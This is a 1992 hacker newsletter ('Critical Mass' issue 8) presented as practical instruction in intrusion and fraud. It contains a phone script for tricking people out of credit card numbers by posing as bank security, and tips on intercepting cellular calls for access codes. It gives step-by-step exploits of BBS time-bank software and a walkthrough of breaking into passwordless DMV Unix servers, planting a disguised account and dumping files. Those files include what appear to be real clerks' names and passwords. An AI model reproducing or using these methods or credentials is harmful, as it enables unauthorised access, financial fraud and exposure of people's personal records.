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"Ah, the cold air..... Tis the season to be p/hacking...." _____________________________________________________________________________ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ \ Critical Issue # 08 A Technical Text / \ Mass ~~~~~~~~~~~ File Newsletter. / \________________________________|____________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ __________________________ __________ l___________ | ___________l // \ _______ _____ l|l _____ ______ ___ // /~~~~~~~\_\ l \ l l l|l l l // \ _ l l // / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l <<<< ritical l / l l l|l l l // / / \ l l \\ \ l < l l l|l l l <<<< / ___ \ l l \\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____ \__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l ==--> ==--> ____ __ ____ ==--> <12/23/92> l \ / l ass ==--> l \ / l __ ______ ______ l \ / l / \ / \ / \ A Technical l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~ l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 8 l l l l /_/ \_\ /~~~~ / /~~~~ / ~~~~ ~~~~ ~~~~~~ ~~~~~~ _____________________________________________________________________________ l Writters l Special thanks to.... l l__________________________l________________________________________________l l l l l The Beaver l Shadow Hacker, Altos, Section 8, l l Altos l Abigail, D.M., Black Knight, Number Cruncher l l Black Knight l and many other that I forgot l l l to include. l l__________________________l________________________________________________l Critical Mass Technical Newsletter is free to those who wish to gain in further knowledge of topics of Telecommunications, Datacommunications, Computer and Phone Security, Software and other forms of piracy, explosives, and other forms of not widely known or talked about topics. All articles are totally original, unless stated otherwise. We will not except unoriginal, plagiarized articles, or articles that contain false information. We except articles from anyone who is willing to follow these criteria, and as long the editors, writters and S.A.O.O. members feel that the article is worthy to print. We encourage all to download these files and pass them on freely to others as long as credits of the editors, writer or S.A.O.O. is not modified in any way. There is no set date for release issues, but we attempt to put them out as frequently as possible. We now also offer BBS's outside the Tallahassee area to get on our BBS listing. If you decide to get on this list, we will send you issues as soon as they are produced. We also now sponser a total legit network called, "UnRegNet". The converstions included general hacking, basic and advanced hacking, hacking Unix, hacking VMS, pyro <Explosives and fire>, anarchy <killing>, pirate, and much more... Come and check it out......... If you wish to become a part of UnRegNet, please leave mail on UnRegNet in the HGENERAL to either The Beaver or Black Knight at one of the following UnRegNet BBS's..... Tower Of Power <904>668-6745 The Speed Shop <TSS> <904>PRI-VATE - Mail The Beaver for the number. Silicon Nightmare <904>PRI-VATE If you have any questions pertaining to a article, please leave E-Mail to the author of the article. If you cannot get in contact with the author, please leave "The Beaver" mail at the one of the BBS's above and he will try to put you in touch with the author, and/or try to answer your questions. SAOO Support Boards The Speed Shop <New SAOO Main!> <904>PRI-VATE Silicon NightMare <904>PRI-VATE To gain access to one of the following BBS's, please contact the sysop of the board or a member of the SAOO. If you wish to become a member of the S.A.O.O. please leave The Beaver E-Mail, where he will send you an application for you to fill out. From there, local S.A.O.O. members in your area will consider you and take a vote on if at that date you can become a member. We are always looking for experienced and even non-experienced p/hackers to join. Only after a back-ground check and the vote, will you be let in. If you fail to get in, do not be mad, we have turned down many people. Simply wait, improve the reasons that you where not let in, if possible, and in the mean time, learn. We are also looking into other remote S.A.O.O. support boards to net with and share information with. In the event that you would like to support a S.A.O.O. chapter in your area, please contact a member of the Tallahassee S.A.O.O. Benefits do come. Head Chief And Writer - The Beaver Editor - Altos Members - <S>ilicon <A>luminum <O>xidation <O>rganization. If you wish to become a distribution point for Critical Mass, please E-Mail the Beaver, and I will add you to the list. You will get your copy of Critical Mass as soon as they are produced. This Issues Articles Include: I. - Editorial By The Beaver II. - How To Bust Into Systems <TimeBanks That Is!> By Black Knight III. - Hacking Florida DMV By The Beaver IV. - Basic Telenet <With NUA's> By Altos V. - CitiCorp/CitiBanks Telenet NUA's By The Beaver and Altos VI. - SAOO Telenet Scan <The "Thousand" Scan> By The Beaver VII. - Basic Anarchy For The Youngsters. By Penial Implant VIII. - Finnal Notes ________________________ Editorial By The Beaver ________________ Yes, Yes, Yes.... Welcome one, welcome all to yet another Critical Mass.... What do you say that we stop and take a look around us for a moment.......... God... It seems that we have come upon yet another Xmas. We all knows what this means... More public mail like "HI, MY NAME IS TIM. tHIS iS MY FIRST TIME ON A bBS!". Which will lead to, "wheres the k-k00l killer kean warez!"... Ahh, well.. we all have to start somewhere. To thoughs whom do not know, UnRegNet IS underway! Yes, thats right Tallahassees first echo on the topics of P/Hacking, Piracy, Explosives, drugs, and just general all American chaos is discussed. I want to get a little something straight here, before some people start posting "killer k0dez" and stuff on the echo.... The echo is legit... Yes, it is total legal, which basicly means that you cannot post information that is of a illegal nature....<I.E. - Credit card numbers, hack accounts/codes, etc>..... However, since we do live in a country where we can all yell at any given point in time, "I plead the 5th", and along with the great tradition of, "Its information, thats all.... You have heard of the first amendment you S.S. commie swine you?", you can discuss the method of general hacking...... We also invite other people to get involved in the echo, such as Computer Security Specialist, and people whom are against p/hacking in general.... We <Well most of us> love to hear the imorals of hacking. If you even got a gripe about the whole thing, please do tell... Let me state again, however, that this is a legal net, and not a flame echo... Keep it within reason...... If you do have a gripe, please leave it in the Anti-Hacker area only... In other local news, the local community has lost some great BBS's in our local area. One of which was Section 8's old BBS along with the viral collector king, Dr. Strangelove. I found this out the other day.... Seems that ole Centel is trying to pull a fast one on there ANI <Automatic Number Identifiers> dialups. DM and I embarked on a 3 digit scan to find Centel's new ANI's. Low and behold, after scanning over 700 numbers, they move the damn ANI to a 4 digit exchange! Welp, considering that there is no need for you to do the work <and besides the fact, I got the new ANI while looking over a Centel linemans shoulder!>, here it is.... Dial 7118. What is ANI you ask? Well, I will let you dial it and decide... Basicly, this will tell you any fone number <Within Leon County> that you are dialing from.... Heres some other information that was not enough to make it to actual articles. Actually, some of them I heard/read about, but I will share with you anyway. Fact: FDLE's <Florida Dept or Law Enforcement> database is ONLY 2 gig! Every want a credit card number <Visa, Mastercard, Etc>, but just just could not find the means? Welp, here is what you do. Pull the following social engineer........ First go to a fortress/loop/whatever! Mark - "Hello." You - "Yes, This is Dave at CitiBank Security. We have seem to have had a computer break-down and there is a problem with your VISA and you will not be able to make anymore trans- actions until it is re-entered. Can you give me you VISA number?" Mark - "Ahhhh, I don't know, this sounds a little fishy, buddy. I got a idea, how about I call you...." You - "I understand that you are reluctant. Here you go, this is my office number. <Give him the Fortress/loop/whatever number>" Mark - "Okay, bye." You - "Goodbye." <Wait a little while> RING! You - "Citibank Security, This is Dave, how may I help you?" Mark - "Ahh, okay.... I thought this might be a scam or something. Anyrate, my VISA number is blah, blah, blah....." Easy as that. I don't know about you, but if you want LD codes/extenders, VMB passcodes, etc, there is one really neat way to do it. I was reading a few days ago in Phrack, or maybe it was Phun. Anyrate, They had a article on using scanners to intercept fone <Cellular, Portable and Airline> conversation, along with other freq's, such as bugs, FBI, etc, etc. Now, lets say you hooked up a tape recorder to you scanner via the earfone jack and recorded stuff. Lets say, you drop into Airline fones. You are gonna get codes! The same with cellular and maybe even portable fones. I know what I want for Xmas! Centel looks like it will be finally bought out by US Sprint! Centel has been quoted as saying that they would not upgrade Leon County telefone equipment until they where sure that US Sprint was indeed going to buy them out. This explains alot of the trouble with our local telefone system here. Speaking of trouble, in the 385 trunk, some of you that are in it may experience trouble in that your calls will seem to be "diverted" <The remote fone rings then you get a dialtone before the remote party answers> or get other peoples conversations. I called Centel and talked to a tech there, this is what he has to say..... "Yeah, on the 385 trunk, in some areas, when it get moist out the lines cross over, thus shorting out." "When will it be fixed?" "Thats hard to say, seems that it is a tough problem to fix. Tall- ahassee only has on prefix in town that has fiber optics. There is really no telling." I believe the prefix he was refering to was the 942, though I am not sure at this time. According to Tallahassee local news, DMV <Dept. Of Motor Vec.> is changing its format used on there local computer systems. It seems that more people will have access to your driving records. The new system will give information pretaining to tickets, DUI, expired tags, etc, etc. The majority of the users look like they will be people like Budge Rent'a Car, and other car rentals. The system will also work alot easier than it currently does. All one must know is the Name. Currently <See hacking DMV in this issue of Critical Mass>, one needs a alot of information such as VIN's, Tag numbers, specific dates, etc. What this will allow the curious hacker is a more than easy way to find out the same information. Strange NUA: If you can, connect to the following NUA from your local Telenet/ Whatever dialup........... 224206 < its in the 3110 Telenet DNIC > This will give you a list of Hong-Kong flight schedules. Just fun to show you friends! ___________________________________ How To Bust Into Systems (Time Bank Systems, That Is!) By Black Knight (Of Course!) ____________________________ I'd first like to let everyone know that I did not find all of these by myself. I was given how to do two of these by other people, but I'm just showing them so that you can do them yourself; I am NOT taking credit for them. Anyway, here they are: 1) How To Get Extra Time With Searchlight With one of the older versions of Searchlight, it came with a time bank that was EXTREMELY faulty. The only things you could do was withdraw, deposit, and quit. Unfortunatly, since most people don't use Searchlight and don't have that old version, this will usually not work. But, it's worth a shot. What you need to start out with is to use all but three minutes of your on-line time. Then go to the Time Bank. In there, you will want to deposit your time. It will say how much time you have available to deposit and ask you how much you wish to deposit. You will want to deposit as much time as it says you can, probably about two or three minutes. So type in "2" or "3". BUT, don't press enter. You know have to wait. How long? Well, how about two or three minutes? After you think you're time would've run out, press enter. It will exit you back to the main menu of the Time Bank and say you have about 16000 minutes left. Good job! This Time Bank scam works on the fact the the Searchlight Time Bank works on a cycle theory. When you're waiting for the two or three minutes, the time bank is still clicking it's time away. So after waiting, your time remaining is actually zero or less. So after depositing two or three minutes, which you don't have, you will definitly have a negative value for your time remaining. This is where the cycle comes in. The Time Bank essentially "thinks" that you have negative time. and since that is obviously impossible, it just wraps your time around to the maximum value. Although this is a great trick, you are only allowed to deposit 2000 minutes or so. Oh well! 2) How To Get Extra Time With HamBank This is a proven trick you can pull with HamBank version 1.2. This is extremely easy to do and takes virtually no effort. A user of mine suddenly had 500 minutes remaining one day. I said "How in the HELL did you do that?". Of course, he wouldn't say, so I watched him and eventually figured out the trick. Of course, I drop his time down to nothing after he does it, but it's worth a shot, isn't it? You first need to find a board that uses HamBank; usually an RA, QBBS or XBBS. As soon as you log on, feel free to go right to the Time Bank. If you already have some time in there, withdraw all of it. Then exit back to the BBS. Now go back to the Time Bank. Now you'll have around 100 minutes or so... doesn't really matter, but the more the better. Either way, once in the Time Bank the second time, deposit all but five minutes of your time. It will say something like "Do you wish to deposit this amount? (y/N)". Of course, you press "Y" and then hit enter. As soon as you hit enter, drop carrier. Then call the BBS back. You will have the same amount of time that you had when you return from the time bank after withdrawing all you time, about 100 minutes or so. This works on the fact that HamBank is stupid. Really! After you deposit your time, HamBank ASSUMES that you've done nothing while in the program. So of course, it reports back to RA, QBBS, whatever that you've done nothing and to maintain the same amount of time as when you shelled out. BUT, HamBank was even more stupid because it saved your HamBank banking account before you hung up. Therefore, you have your 100 minutes or so in both RA AND HamBank. But as I suggest that after doing this, you do not log right back on. Wait an hour or two and then log on so that the SysOp doesn't notice anything. Give this a shot, it works great! 3) How To Get Extra Time With Remote Access Timebank Service This is another scam, but I figured this one out on my own. This is a lot like the Hambank scam, but goes the opposite direction. Although most boards these days don't use Remote Access Timebank Service (hereon mentioned by RATS), this is still a good thing to do. First you need to find a board that carries this Time Bank (usually an RA board <GRIN>). Anyway, once on, you need to start with about 30 minutes or so. Enter the bank and deposit around 30 minutes. Now, exit back to RA. After returning to RA, go BACK to RATS. Now, this time withdraw your deposited time. After it "says" that it saved your account, hang up. Call back the board. RA says that you have all your time back again. Enter RATS and you'll see that all your time is still in there. All you need to do is keep calling back the board, withdrawing time, and hanging up. Lot's oh phun. This works by two facts. First, RATS is old as a mother-fucker. Second, RATS is more stupid than HamBank. When you deposit your 30 minutes into it, it is just saving your account in EXITINFO.BBS, not the actual RATS account. But when you exit back to RA, that's when it saves. And when you withdraw your time, all it's doing is editing the EXITINFO.BBS and when you hang up, it assumes you've done nothing and it goes ahead and exits without saving your account. But of course, when RA sees that you have some extra time, it will save your account and then hang up. Try all of these out, they are great phun. In the meanwhile, I'll be writing my own Time Bank <GRIN>. Really though, if you figure out how to bust another Time Bank, please let me know. You can contact me on my board, The Tower of Power, via (9o4) 668-6745, FidoNet 1:36o5/256, or UnRegNet 222:13oo/4. laTeR... - Black Knight - Member of UnRegNet - Sysop Of Tower Of Power <904>668-6745 _____________________________ Hacking DMV By The Beaver _________________ This articles focus is on DMV <The Dept. Of Motor Vec.>, and the security around there machines..... It is fairly straight forward, and though I cannot say that all DMV machines are the same, most servers probably are...... The machines discussed here are in the local <Tallahassee> area. -------------------------------------------------------------- Ok, first off, you will want to find a DMV server, correct? Well, As much as I would like to, I cannot give the number, because everone would hack'em and that would be a major hassle, plus the fact that someone would get busted.... However I will tell you that one machine is located in the upper 487 prefix. <Above the 5000 exchange>. The rest is up to you. DMV servers run under Unix, and it is unreal how easy to defeat there security is.... It is simply a matter of knowing what username to type in. On the DMV servers I have played with, there is NO passwords on ANY of the accounts... This includes root, sysadmin, who, uucp... You name it! Now, upon calling a DMV machine, here what should happen.. When you call it, you will have to wait a minute for the login prompt... Which should be look something to this...... Northwoo 2400 login: At which point, the first thing to do is login as root. Since DMV machines hold no password, you should become superuser quite easily. After that, do a "who" <Shows all users online>, you will probaly see some non-interactive accounts on..... For saftey reasons, do not login during working hours! I prefer sometime at night.... Ok, after you look around a bit and see that you are getting nowhere, go ahead and "cat" <sorta like the "type" command on DOS and VMS machines> and capture the passwd file... This will be in the etc directory... For example, here is what you would do.... $ cd /etc $ cat passwd This will dump all the usernames on the system and along with there encrypted password <this holds true with all Unix based systems>.... Don't worry about the encrypted passwords, because as I said, they don't use passwords at DMV! Here something what you should get.....<BTW This is off a DMV machine> root:x:0:3:0000-Admin(0000):/: sa:x:0:0:SA Menus Login:/sa:/sa/sa.exec sarem:x:0:0:SA Menus Remote Execution:/sa:/bin/sh startup:x:0:0: Start Multi-User Mode:/:/etc/startup shutdown:x:0:0: Multi-Single-Halt Mode:/:/etc/shutdown reboot:x:0:0: System Reboot :/:/etc/reboot halt:x:0:0: System Halt :/:/etc/halt daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/bin: sys:x:3:3:0000-Admin(0000):/usr/src: adm:x:4:4:0000-Admin(0000):/usr/adm: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:10:10:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico sync:x:20:1:0000-Admin(0000):/:/bin/sync who:x:21:1:0000 Admin(0000):/:/bin/who diag:x:22:1:User Diagnostic Tests:/tst:/bin/sh lp:x:71:2:0000-lp(0000):/usr/spool/lp: listen:x:81:4:0000-listen(0000):/: setup:x:0:0:general system administration:/usr/admin:/bin/rsh sysadm:x:0:0:general system administration:/usr/admin:/bin/rsh checkfsys:x:0:0:check file system:/usr/admin:/bin/rsh makefsys:x:0:0:make file system:/usr/admin:/bin/rsh mountfsys:x:0:0:mount file system:/usr/admin:/bin/rsh umountfsys:x:0:0:unmount file system:/usr/admin:/bin/rsh frvis:x:201:201:frvis:/FRVIS:/bin/sh help:x:0:0:frvis-help:/FRVIS:/FRVIS/help sta0:x:100:201:Station Number 0:/FRVIS/OBJ:/FRVIS/OBJ/go sta1:x:101:201:Station Number 1:/FRVIS/OBJ:/FRVIS/OBJ/go sta2:x:102:201:Station Number 2:/FRVIS/OBJ:/FRVIS/OBJ/go sta3:x:103:201:Station Number 3:/FRVIS/OBJ:/FRVIS/OBJ/go sta4:x:104:201:Station Number 4:/FRVIS/OBJ:/FRVIS/OBJ/go sta5:x:105:201:Station Number 5:/FRVIS/OBJ:/FRVIS/OBJ/go sta6:x:106:201:Station Number 6:/FRVIS/OBJ:/FRVIS/OBJ/go sta7:x:107:201:Station Number 7:/FRVIS/OBJ:/FRVIS/OBJ/go sta8:x:108:201:Station Number 8:/FRVIS/OBJ:/FRVIS/OBJ/go sta9:x:109:201:Station Number 9:/FRVIS/OBJ:/FRVIS/OBJ/go sta10:x:110:201:Station Number 10:/FRVIS/OBJ:/FRVIS/OBJ/go sta11:x:111:201:Station Number 11:/FRVIS/OBJ:/FRVIS/OBJ/go sta12:x:112:201:Station Number 12:/FRVIS/OBJ:/FRVIS/OBJ/go sta13:x:113:201:Station Number 13:/FRVIS/OBJ:/FRVIS/OBJ/go sta14:x:114:201:Station Number 34:/FRVIS/OBH:/FRVIS/OBJ/go Actually for the articles sake, this is a bit edited so that it is not as long..... Now, lets take one of these guys and examine it.... sarem:x:0:0:SA Menus Remote Execution:/sa:/bin/sh ^ ^ ^ ^ Username Password<none> Brief Discrition Shell Now, look at the Shell field.... There are several types of shells, such as sh <Standard Shell>, csh, and ksh <Kernal Shell>. What does this mean? Shell are nothing more than work areas. That is, if you are one of those three shells, you can work at a Unix based level, meaning you are actually dealing with the operating system itself, similar to when you login under the root account.... You are working with Unix itself. Now lets look at another...... sta10:x:110:201:Station Number 10:/FRVIS/OBJ:/FRVIS/OBJ/go ^ ^ ^ ^ Username Password Brief Discription Whats This!?!? Hmmmm, look at where are shell should be.. there is no sh, csh or ksh shell but rather "go" in the "/FRIVIS/OBJ" directory?!? Actually it is rather simple... It is a program that is executed at login, and this account has NO shell access. Look at it this way, at DMV they had a choice to make everyone learn Unix or create a simple menu system so that any idiot could us it <No offense to any DMV people, but it is the truth>. Before we go executing this menu system, would it not be nice to look like everyone else that logs in other than standing out as the root superuser? Heres what you do.... Logout and call back, this time login under "sysadm", with, of course, no password. Just follow instructions and make a new account, and call it sta50 or something like that, so you won't stand out. Make it just like the other sta accounts <See the passwd file above>, BUT when it talks about a shell, tell it you want a "/bin/sh" shell, or what ever you desire. Once you have made your new account, quit and login under "sta50" with no password, and boom, you fit right in, if someone looks at ya! But wait, with a "sh" shell you are no longer superuser right? Wrong. If you hit any files that are out of your access to touch, type "su" <For superuser>, and of course, you will not be prompted for a password. Ok, thats out of the way.... You fit right in... Now, lets go back to this "go" thingy that we were discussing above. <BTW I am aware of the fact that you can create logins using> <vi editor, but for the articles sake, we will keep it simple> Remember that the program was in the FRIVIS/OBJ directory, so simply type..... # cd /FRVIS/OBJ ^ Note: I am SuperUser The cap's DOES matter.... When you see something in cap's, type it that way! Ok, now we are in this directory where the program "go" is.... We are a bit curious to see what this "go" thang does.. So type....... # exec go Here is what you should get..... M61L10- --------------------- LOG ON -------------------- CLERK: ENTER OPERATOR NAME (__________) ENTER YOUR ALLOWED_FUNCTIONS ( ) 1. TITLE ONLY 2. REGIS ONLY 3. REGIS/TITLE 4. CASHIER ONLY 5. TITLE/CASHIER 6. REGIS/CASHIER 7. REGIS/CASHIER/TITLE NOTE: ENTER OPERATOR NAME AND ALLOWED FUNCTIONS AND PRESS RETURN. IF CORRECT, YOU WILL BE PROMPTED FOR YOUR PASSWORD. Oh, great! We have to login AGAIN! Never fear! Remember, we are SUPERUSERS! So get out of this crap and re-login under your fake account... Now, considering that the above is actually a program that is asking for a password, we know that the program must store the Usernames/Access levels/Passwords in a file. So re-login, at go to the following directory like this.... # cd /FRVIS/DATA In this directory, you can get a file called OPERATER, that contains all the accounts that the people at DMV use...Once in this directory, type...... # cat OPERATOR Now, cat the file called "OPERATOR", it should look like this.. 00000100NAME00 PASS00070000 00000101DIEFENDORF050967030000 00000102THOMAS 090265030000 00000103MOODY M 011538070000 00000104NAME04 PASS04030000 00000105NAME05 PASS05030000 00000106JACKSON C 050543030000 00000107HASLE BO 041449030000 00000108SHOUPE PAM081262030000 00000109CHAMBERS 042637070000 00000110RABONR 111152070000 00000111FRIERSON 031944070000 00000112MEDLEY D 021659030000 00000113MERRITT L 042159070000 00000114REED T 082160030000 00000115HILTON J ADASST070000 00000116MIDDLETOND041033040000 00000117CARPENTER 030868030000 00000118HENDERSONA123058030000 00000119FABIAN P 040538030000 00000120JACKSON A 061164030000 00000121HODGES S 092957070000 00000122CONE V 092731070000 00000123WILLIAMS R082757070000 00000124DRINKWATER112957030000 00000125STRUMSKI V043036030000 00000126KITTRELL 013063030000 00000127WILLIAMS S073170030000 00000128SHARPE B 051451070000 00000129FOUNTAIN 062834070000 00000130NAME01 PASS1 070000 00000131NAME1 PASS1 070000 00000132JORDAN MAGGOT070000 00000133CLERK20 AUTOAP060000 00000134CLERK27 AUTONM060000 00000135NAME35 PASS35070000 00000136NAME36 PASS36070000 00000137NAME37 PASS37070000 00000138NAME38 PASS38070000 00000139NAME39 PASS39070000 00000140NAME40 PASS40070000 00000199MAGGOT-1 MAGGOT070000 00000151UNISYS UNISYS070000 Now, to decipher this crap... Lets look at one..... 00000199MAGGOT-1 MAGGOT070000 ^ ^ ^ Username Passwd Access Level Ok, their username is Maggot-1, their password is Maggot and their access level is 7000. Let me explain a little more about how you came to this.... Go to the beginning of the string, now count 8 places out... You will land on the M... From here you can see how I got maggot-1. Now, move to the second maggot, and go up to the first 0 you hit. Now anything past the zero is the level... The lower the better..... Use levels 3000 preferably. Here, let look at another...... 00000135NAME35 PASS35070000 ^ ^ ^ User Passwd Level So the username is....... NAME35, Password35 at level 7000 <or what ever they call it>. Now we can use DMV as it is supposed to be used. So go back to the directory FRVIS/OBJ and execute go. Now when it asks you for a operator name and password, you will know exactly what to do! Before I leave you off hack'in DMV, let me state that DMV is NOT in anyway fun to use. You must supply VIN's, Registration dates, and it just a pain in the ass... The advanages are that you can find out where people live, fone numbers <Private/ Non-Private line>, driving records, tag numbers, police cars tag numbers....... Alot of shit! Chow! ---==<Beaver>==--- Moderator Hack! UnRegNet Moderator Hacker! UnRegNet Moderator VAX/VMS UnRegNet Member SAOO ================================== -+| Hacking the Telenet Network |+- ================================== = Constructed by, = = Altos = +========+========+ ============================|========|========|=================================== Some things to do while online with Telenet and Tymnet. While at the @ on the Telenet system type "mail" or "C mail" or "telemail" or even "c telemail" this access's telenets mail system simple entitled "Telemail" from there it will ask "user name" or something like that type "phones" next it will prompt you "password" enter "phones". The phones service has alot of worthy information it will give you a menu to choose from the rest should be self explanatory. Along with the other information on the phones service there is a complete updated list of all Telenet access numbers which is conveinent. Once you have tried the phones service also on telemail enter "Intl/Associates" as the user name and "Intl" for the international access numbers. If you are calling from overseas somewhere connect with an telenet access number then type this Nua at the telenet @ prompt "311020200142" and enter the username and password. You might want to pick up a sort of a reference booklet on Telenet simply again call the customer service number and ask them for "How to use Telenet's Asychronus Dial Service" and give them your address which is self explanatory. Another tidbit of info you would like to know if you already didnt know that Telenet is owned by Us Sprint long distance service. another way to obtain access to this network from your home or apartment even a phone booth, you first need to know a number to connect to. The international number is as follows: 1-800-424-9494, And the local access number for telenet is 561-8830 E71 You need to have your modem settings at E71 and your terminal at VT100, after you connect you will see 'TERMINAL=' at this prompt you need to enter a '@' and then press enter, you should then get a '@' at this prompt enter your telenet address let's say we tried '655321' EX: @ 655321 blah blah blah CONNECTED! Virgin Island Coast Guard Login> hack it! Password> hack it! After you have tried unsucessfully a few times, it will proceed to bump you off so do not be alarmed by it, disconnection will (should) occur after the incorrect password, not during entering a user or such after you get booted it will send you back to the telenet prompt '@' where you can again enter another address. The first thing your going to have to have is your Access number it is very easy to get your local access number. Simply call telenet at 1-800-TELENET that is thier customer service number and ask for your dialup the operator will ask for your area code and prefix of your phone number he/she will also ask your baud rate. There are many telenet ports across the country and internationly with varying baud rates from 110 bps (yuck) to 9600 (i wish i had) so you will want your maximum baud port most locations have atleast 1200 many have 2400 and not alot have 9600 ports like for big cities like Detroit and Los Angeles at the end of the file i will list some useful numbers. I. HOW TO USE THIS NETWORK How to use this network was explain in short detail above, however ther is more to the explainations on how to use this network, if you try to enter just shit at the telent prompt '@' it will not recognize it, it will come up with a '?' write under your telenet prompt, all the prompt will except is address. Also not explained already is the format of address, all address are not in the format of xxxxxx (6 digits) you can have address like 123456.7, and so on, This is a clever little way to find a back door to a system, let's give another example. EX: 123456 REJECTING CONNECTIONS, TRY BACK LATER Well yeah, it's true telenet address 123456 is rejecting, but possibly 123456.5 isn't, and that is your way into a system however, this doesn't always work. So you may end up logging off and trying back later. Error messages are always going to be learking around just waiting to get in the way of your hack so I put together a few to watch for, and a brief explanation to them in topic III II. - TELENET TERMS Not Available Not Operating Not Responding - Your net feed can't accept your request, and try it back later. Not Connected - You have entered a telenet command thats is only able to be used while in a connection type 'cont' to get back in a connection. Not Reachable - A temporary probelm or condition keeps you from using the network. Password - This is the prompt which appears after you have entered an NUI (Network User Idenifaction). Invalid User ID or Password - The NUI you used is not valid.